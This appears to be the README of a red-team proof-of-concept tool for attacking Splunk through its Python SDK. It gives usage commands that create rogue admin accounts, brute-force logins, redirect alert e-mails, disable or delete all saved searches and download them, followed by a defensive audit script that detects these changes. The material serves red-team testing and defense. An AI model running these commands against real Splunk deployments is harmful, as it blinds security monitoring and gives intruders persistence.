splunkdefeat is a wrapper around the Splunk Enterprise SDK for Python that helps red teamers run multiple attack techniques against Splunk. The motivation for this proof-of-concept tool was to illustrate practical attacks against Splunk, the associated risks, and how defenders can implement countermeasures. The author assumes no liability for use of this tool.
A more detailed write-up can be found here: splunkdefeat — A Splunk SDK wrapper for red teams
Clone the repository:

```bash
git clone [email protected]:markernest0/splunkdefeat.git
```
splunkdefeat depends on the python-dotenv, prettytable and splunk-sdk Python modules.

Install the Python dependencies:

```bash
pip install -r requirements.txt
```
| Short Form | Long Form | Description | Tactic | Technique | Sub-Technique |
|---|---|---|---|---|---|
| -h | --help | Show this help message and exit | - | - | - |
| -au | --add_user | Enter the username to create | Persistence | Create Account | Cloud Account |
| -ap | --assign_password | Enter the password of the new user | Persistence | Create Account | Cloud Account |
| -ar | --assign_role | Specify the role of the new user (default choice is admin). Choices: {admin, power, user} | Persistence | Create Account | Cloud Account |
| -ur | --update_role | Specify the role to update with a capability. Choices: {admin, power, user} | Persistence | Account Manipulation | Additional Cloud Roles |
| -uc | --update_capability | Specify the capability to add to a role. Choices: {admin_all_objects, schedule_search, edit_user, delete_by_keyword, all} | Persistence | Account Manipulation | Additional Cloud Roles |
| -ue | --update_email | Enter the new email address for alerts | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -ds | --disable_searches | Disable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -es | --enable_searches | Enable all searches | Defense Evasion | Impair Defenses | Disable or Modify Tools |
| -sh | --splunk_host | Domain name or IP address to enumerate | Credential Access | Brute Force | - |
| -sp | --splunk_port | TCP port to connect to on the host (default: 8089) | Credential Access | Brute Force | - |
| -su | --splunk_user | Specify the username | Credential Access | Brute Force | - |
| -sf | --password_file | Specify the use of a password file | Credential Access | Brute Force | - |
| -lu | --list_user | List the current user | Discovery | Account Discovery | Cloud Account |
| -la | --list_all | List all users | Discovery | Account Discovery | Cloud Account |
| -lr | --list_roles | List all roles | Discovery | Permission Groups Discovery | Cloud Groups |
| -ls | --list_searches | List all searches | Discovery | Cloud Service Discovery | - |
| -ss | --save_searches | Save all searches locally | Exfiltration | Automated Exfiltration | - |
| -du | --delete_user | Delete a specific user | Impact | Account Access Removal | - |
| -rs | --delete_searches | Delete all searches | Impact | Data Destruction | - |
| -ms | --manipulate_searches | Manipulate all searches | Impact | Stored Data Manipulation | - |
- To list all options and switches, use the `-h` switch: `python splunkdefeat.py -h`
- To create a new user, use the `-au`, `-ap` and `-ar` switches: `python splunkdefeat.py -au splunk-replicate -ap mypassword123 -ar admin`
- Modify a role with additional capabilities: `python splunkdefeat.py -ur admin -uc delete_by_keyword`
- Update the email for all search alert actions: `python splunkdefeat.py -ue [email protected]`
- Disable all searches: `python splunkdefeat.py -ds`
- Enable all searches: `python splunkdefeat.py -es`
- Brute force a user: `python splunkdefeat.py -sh splunk.example.com -sp 8089 -su sc_admin -sf`
- List the current user and role: `python splunkdefeat.py -lu`
- List all users and roles: `python splunkdefeat.py -la`
- List all roles and capabilities: `python splunkdefeat.py -lr`
- List all searches: `python splunkdefeat.py -ls`
- Download all saved searches locally: `python splunkdefeat.py -ss`
- Delete a user: `python splunkdefeat.py -du user_a`
- Delete all searches: `python splunkdefeat.py -rs`
- Manipulate all searches: `python splunkdefeat.py -ms`
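As an added example (not part of the splunkdefeat project), the same splunk-sdk the tool wraps can be used on the defender's side: the script below audits a Splunk host for the artifacts the options above leave behind (unexpected accounts, roles that gained capabilities such as delete_by_keyword, disabled saved searches, alert e-mail recipients outside the expected domain). The audit functions work on plain dicts so they run without a Splunk host; `collect_from_splunk()` and the field names it reads (`capabilities`, `roles`, `disabled`, `action.email.to`) are assumptions about the splunklib.client API, and the sample data is constructed.

```python
"""Audit a Splunk instance for the artifacts splunkdefeat's options leave behind (added example)."""

# Capabilities the -uc option can graft onto a role; any not in a role's known baseline is a finding.
RISKY_CAPABILITIES = {"admin_all_objects", "schedule_search", "edit_user", "delete_by_keyword"}

def audit_roles(roles, baseline):
    """roles: {role: [capabilities]}; baseline: {role: set(expected capabilities)} (-ur/-uc)."""
    findings = []
    for role, caps in roles.items():
        for cap in sorted((set(caps) & RISKY_CAPABILITIES) - baseline.get(role, set())):
            findings.append(f"role {role!r} gained capability {cap!r}")
    return findings

def audit_users(users, known_users):
    """users: {username: [roles]}; report accounts missing from the inventory (-au/-ar)."""
    return [f"unknown user {u!r} with roles {r}" for u, r in users.items() if u not in known_users]

def audit_searches(searches, alert_domain):
    """Flag disabled saved searches (-ds) and alert recipients outside alert_domain (-ue)."""
    findings = []
    for s in searches:
        if str(s.get("disabled", "0")).lower() in ("1", "true"):
            findings.append(f"search {s['name']!r} is disabled")
        for addr in (a.strip() for a in s.get("action.email.to", "").split(",")):
            if addr and not addr.lower().endswith("@" + alert_domain):
                findings.append(f"search {s['name']!r} alerts to external address {addr!r}")
    return findings

def collect_from_splunk(host, port, username, password):
    """Pull live data with splunk-sdk (ASSUMED API: client.connect, .roles/.users/.saved_searches)."""
    import splunklib.client as client  # imported here so the pure checks above run without the SDK
    svc = client.connect(host=host, port=port, username=username, password=password)
    roles = {r.name: list(r.content.get("capabilities", [])) for r in svc.roles}
    users = {u.name: list(u.content.get("roles", [])) for u in svc.users}
    searches = [{"name": s.name, "disabled": s.content.get("disabled", "0"),
                 "action.email.to": s.content.get("action.email.to", "") or ""} for s in svc.saved_searches]
    return roles, users, searches

# Constructed sample state, as a host would look after the -au, -uc, -ue and -ds examples above.
SAMPLE_ROLES = {"admin": ["admin_all_objects", "edit_user", "delete_by_keyword"], "user": ["search", "schedule_search"]}
SAMPLE_BASELINE = {"admin": {"admin_all_objects", "edit_user"}, "user": {"schedule_search"}}
SAMPLE_USERS = {"admin": ["admin"], "splunk-replicate": ["admin"]}
SAMPLE_SEARCHES = [{"name": "Failed logons", "disabled": "1", "action.email.to": "soc@corp.example"},
                   {"name": "New admin", "disabled": "0", "action.email.to": "soc@corp.example, x@evil.example"}]

def run_sample():
    """Run all three checks over the constructed sample; returns the list of findings."""
    return (audit_roles(SAMPLE_ROLES, SAMPLE_BASELINE) + audit_users(SAMPLE_USERS, {"admin"})
            + audit_searches(SAMPLE_SEARCHES, "corp.example"))
```

Against a live host, replace the sample constants with the tuple returned by `collect_from_splunk()` and keep the baseline and known-user inventory in version control so drift is visible.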